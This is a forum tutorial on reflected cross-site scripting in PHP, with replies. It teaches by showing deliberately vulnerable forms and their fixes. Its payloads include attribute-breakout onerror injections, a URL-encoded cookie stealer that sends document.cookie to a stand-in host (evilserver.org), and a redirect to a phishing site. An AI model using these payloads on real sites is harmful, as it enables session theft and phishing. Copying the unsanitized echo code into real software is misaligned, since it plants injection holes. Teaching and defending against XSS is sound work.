Guide to XSS (Examples included)
#1
There are many instances of theory tutorials on the internet but very few real life examples. I have intentions to write tutorials that allow for users to understand certain exploits, including how and why they happen. It is in this work that I hope to inspire users to want to learn more and dig deeper. This is XSS.
I assume at this point you have a loose understanding of what cross site scripting actually is; if you don't, please refer to my general hacking guide here.
XSS in User Input
This is the holy grail of XSS that one could find in the wild. Filterless user input. This is a license to do anything to the front end of a page.
This is our HTML and PHP. Normally there would be some more actual PHP going on here but I left it fairly simple for this example.
Code:
<h1>User input</h1>
<form method="get">
<input type="text" name="xss1">
<input type="submit" value="Submit Search">
</form>
<?php
  if (isset($_GET['xss1'])) {
    echo 'You entered "' . $_GET['xss1'] . '"';
  }
?>
Let's start by seeing how the form reacts naturally without any hackery of any kind.
[Image: WTURnJ1.png]
We entered the word "test" and got a very simple result. A result like this is very common on empty result pages for searches, e.g. "Your search term 'Cat Photos' was not found".
Now the first thing I like to do to test whether user input is vulnerable is to input simple HTML. In this case I used the bold HTML tag <b>.
[Image: OMnWizk.png]
Ah-ha! It seems that whoever coded the search did not take the time to sanitize the user input. This means the HTML presented to the user looks something like...
Code:
<h1>User input</h1>
<form method="get">
<input type="text" name="xss1">
<input type="submit" value="Submit Search">
</form>
You entered "<b>HTML elements input</b>"
All that is left now is to actually make this an XSS attack by inserting some real javascript.
For our input we will enter some simple JS like...
Code:
<script>alert('xss');</script>
[Image: wK24BJc.png]
Ding ding, now we know 100% that we can run JS. At this point the HTML presented to the end user looks something like this.
Code:
<h1>User input</h1>
<form method="get">
<input type="text" name="xss1">
<input type="submit" value="Submit Search">
</form>
You entered "<script>alert('xss');</script>"
Since the form we were exploiting uses "GET" (like most search forms) we can actually send our link with malicious JS to do things like steal cookies or redirect them to phishing sites. Examples...
Code:
// Alert XSS
http://localhost/exploits/xss.php?xss1=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E
// Cookie stealer using get variables
http://localhost/exploits/xss.php?xss1=%3Cscript%3Edocument.location%3D%22http%3A%2F%2Fwww.evilserver.org%2Fcookie-stealer.php%3Fc%3D%22+%2B+document.cookie%3B%3C%2Fscript%3E
// Redirect to phishing site
http://localhost/exploits/xss.php?xss1=%3Cscript%3Edocument.location%3D%22http%3A%2F%2Fphishingsite-evil.com%22%3B%3C%2Fscript%3E
Now how can this code be fixed? Simple, filter the user input...
Code:
<h1>User input</h1>
<form method="get">
<input type="text" name="xss1">
<input type="submit" value="Submit Search">
</form>
<?php
  if (isset($_GET['xss1'])) {
    // Encode the raw GET value; the original snippet encoded an undefined $input.
    $input = htmlentities($_GET['xss1']);
    echo 'You entered "' . $input . '"';
  }
?>
XSS in Dynamic HTML Tags
Sometimes in an XSS vuln we don't always have the ability to just use script tags. Sometimes it requires users to get creative. This example is meant to emulate something like bad BB code (like [img]).
Code:
<h1>Load image</h1>
<form method="get">
<input type="text" name="xss2">
<input type="submit" value="Submit Search">
</form>
<?php
  if (isset($_GET['xss2'])) {
    echo 'Removed all HTML...<br>';
    echo 'Loading image...<br>';
    echo '<img src="' . strip_tags($_GET['xss2']) . '">';
  }
?>
So let's see what happens when we use some normal input...
[Image: FTyoDre.png]
So based on the code and the warning supplied to the user, things like script tags and other HTML bits are being stripped out...
Let's see how much we can affect the input though...
Let's try entering the following...
Code:
example.com/404.jpg" foo="bar
[Image: J06fnMN.png]
Fantastic, it seems that we are able to use a double quote to escape the image tag's "src" attribute. Even more so, we are able to create new attributes. If that does seem awesome to you, read up on this document. http://www.w3schools.com/tags/ref_eventattributes.asp
With this knowledge we can now actually execute some javascript. Let's input the following...
Code:
example.com/404.jpg" onerror="alert('xss')
[Image: uZwRk5s.png]
Huzzah. Take that, horribly insecure BB code system. We now have a successful XSS. As per usual this can be used in all sorts of different ways.
How can this be fixed? We have two issues: invalid image URLs can be input, and the src attribute can be escaped. This could be done with a regular expression (Example), but in this case we will simply use htmlentities. This will treat characters like the double quote and equal sign like any other character.
Code:
<h1>Load image</h1>
<form method="get">
<input type="text" name="xss2">
<input type="submit" value="Submit Search">
</form>
<?php
  if (isset($_GET['xss2'])) {
    echo 'Removed all HTML...<br>';
    echo 'Loading image...<br>';
    // htmlentities (the original had a typo, "htmlentites") encodes the double quote,
    // so the value can no longer break out of the src attribute.
    echo '<img src="' . htmlentities($_GET['xss2']) . '">';
  }
?>
XSS in templates (Home work)
Please use the below code to create this on a real environment and attempt to exploit the third form. It should be pretty simple. Good luck.
Code:
<?php

?>
<html>
<head>
<title>XSS Exploit examples</title>
</head>
<body>
<h1>User input</h1>
<form method="get">
<input type="text" name="xss1">
<input type="submit" value="Submit Search">
</form>
<?php
  if (isset($_GET['xss1'])) {
    echo 'You entered "' . $_GET['xss1'] . '"';
  }
?>
<hr>
<h1>Load image</h1>
<form method="get">
<input type="text" name="xss2">
<input type="submit" value="Submit Search">
</form>
<?php
  if (isset($_GET['xss2'])) {
    echo 'Removed all HTML...<br>';
    echo 'Loading image...<br>';
    echo '<img src="' . strip_tags($_GET['xss2']) . '">';
  }
?>
<hr>
<h1>Template system</h1>
<?php
  if (isset($_GET['template'])) {
    $colors = array(
      'black',
      'red',
      'blue',
      'yellow',
    );
    if (in_array($_GET['template'], $colors)) {
      echo '<style>html { background: ' . $_GET['template'] . ';}</style>';
    }
    else {
      echo 'Color "' . $_GET['template'] . '" not found';
    }
  }
?>
</body>
</html>
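Hardened versions of the three forms above, as an added example that is not part of the original post (PHP; the function names are my own, and the image renderer additionally enforces an http/https scheme allowlist, which the tutorial does not):

```php
<?php
// Added example, not the original post's code: context-aware output encoding
// for the tutorial's three forms. Function names here are my own.
const ESC = ENT_QUOTES | ENT_HTML5;

// HTML body context (form 1): encode <, >, &, " and ' so the reflected
// search term can never open a tag.
function render_search_result(string $term): string
{
    return 'You entered "' . htmlspecialchars($term, ESC, 'UTF-8') . '"';
}

// Attribute context (form 2): encoding stops the quote-breakout/onerror trick;
// the scheme allowlist also rejects javascript: and data: URLs, which
// strip_tags never did. Unlike the tutorial, a bare "example.com/..." is refused.
function render_image(string $url): string
{
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    if (!in_array($scheme, ['http', 'https'], true)) {
        return 'Invalid image URL';
    }
    return '<img src="' . htmlspecialchars($url, ESC, 'UTF-8') . '">';
}

// Template context (form 3): emit only the allowlisted constant, never the
// request value, and encode the value in the "not found" message too.
function render_template(string $color): string
{
    $colors = ['black', 'red', 'blue', 'yellow'];
    $key = array_search($color, $colors, true);
    if ($key === false) {
        return 'Color "' . htmlspecialchars($color, ESC, 'UTF-8') . '" not found';
    }
    return '<style>html { background: ' . $colors[$key] . ';}</style>';
}

// Regression check over inputs constructed from the tutorial's own payloads:
// every '<' left in the output must be one the template itself emits.
$probes = [
    [render_search_result("<script>alert('xss');</script>"), 0],
    [render_image("example.com/404.jpg\" onerror=\"alert('xss')"), 0],
    [render_image('https://example.com/404.jpg" onerror="alert(1)'), 1],
    [render_template('<script>alert(1)</script>'), 0],
    [render_template('red'), 2],
];
foreach ($probes as [$html, $expected]) {
    $status = substr_count($html, '<') === $expected ? 'ok  ' : 'FAIL';
    echo "$status $html\n";
}
```

Run it with `php` from the command line; each probe should print `ok`, and the encoded output shows the quote-breakout payload surviving only as inert `&quot;` text inside the attribute.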
#2
Simple but gets to the point.
Only thing I can recommend is talking about all the types of XSS.
#3
The use of htmlspecialchars is another way to stop this kind of attack. You could use ctype_alnum to only allow alphanumeric input.
#4
I like to take input and rub it in your face:

Code:
$ratAxe = trim(html_entity_decode($_POST["message"], ENT_QUOTES, 'utf-8'));
$ratAxe = html_entity_decode($ratAxe, ENT_QUOTES, 'utf-8');
echo htmlentities(html_entity_decode($ratAxe, ENT_QUOTES, 'utf-8'), ENT_QUOTES, 'utf-8');

Output:
Code:
hello, <script>alert('test');</script>, welcome to my site!

sometimes you have to decode it thrice to clean up partially encoded input.